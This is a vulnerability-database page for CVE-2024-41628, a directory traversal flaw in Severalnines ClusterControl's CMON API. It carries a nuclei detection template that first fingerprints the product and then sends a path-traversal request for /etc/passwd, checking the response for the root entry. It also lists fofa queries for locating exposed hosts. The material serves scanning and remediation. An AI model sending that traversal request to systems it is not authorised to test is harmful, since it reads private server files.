Lucene search
K

Cluster Control CMON API - Directory Traversal

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-41628
29 Jul 202407:12
githubexploit
Circl
CVE-2024-41628
26 Jul 202423:53
circl
CNNVD
Severalnines Cluster Control 安全漏洞
26 Jul 202400:00
cnnvd
CVE
CVE-2024-41628
26 Jul 202400:00
cve
Cvelist
CVE-2024-41628
26 Jul 202400:00
cvelist
NVD
CVE-2024-41628
26 Jul 202421:15
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check
18 Apr 201700:00
openvas
Positive Technologies
PT-2024-29470 · Severalnines · Severalnines Clustercontrol
26 Jul 202400:00
ptsecurity
RedhatCVE
CVE-2024-41628
9 Jan 202609:35
redhatcve
Vulnrichment
CVE-2024-41628
26 Jul 202400:00
vulnrichment
Rows per page
id: CVE-2024-41628

info:
  name: Cluster Control CMON API - Directory Traversal
  author: s4e-io
  severity: high
  description: |
    Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API.
  impact: |
    Unauthenticated attackers can exploit directory traversal to read arbitrary files from the Cluster Control server.
  remediation: |
    Update Severalnines Cluster Control to version 1.9.8-9778, 2.0.0-9779, or 2.1.0-9780 or later.
  reference:
    - https://cvefeed.io/vuln/detail/CVE-2024-41628
    - https://github.com/Redshift-CyberSecurity/CVE-2024-41628
    - https://vuldb.com/?id.272533
    - https://vulmon.com/vulnerabilitydetails?qid=CVE-2024-41628
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-41628
    cwe-id: CWE-22
    epss-score: 0.9147
    epss-percentile: 0.99682
    cpe: cpe:2.3:a:severalnines:clustercontrol:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: severalnines
    product: cluster_control
    fofa-query: icon_hash="160707013" || icon_hash="-1815707560"
  tags: cve,cve2024,severalnines,cluster-control,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"ClusterControl","CMON_API")'
          - 'contains(content_type,"text/html")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /../../../../../../../../..//etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206f071334f8710f5f970b17b3b4921b2c01665cb41a265baea5796e88f5fcc5df022100c449cbc98f77521bb7e085fc8bfe9c267cf97a9de7e73d082af1f5af2a15a2b0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5
EPSS0.9147
SSVC
35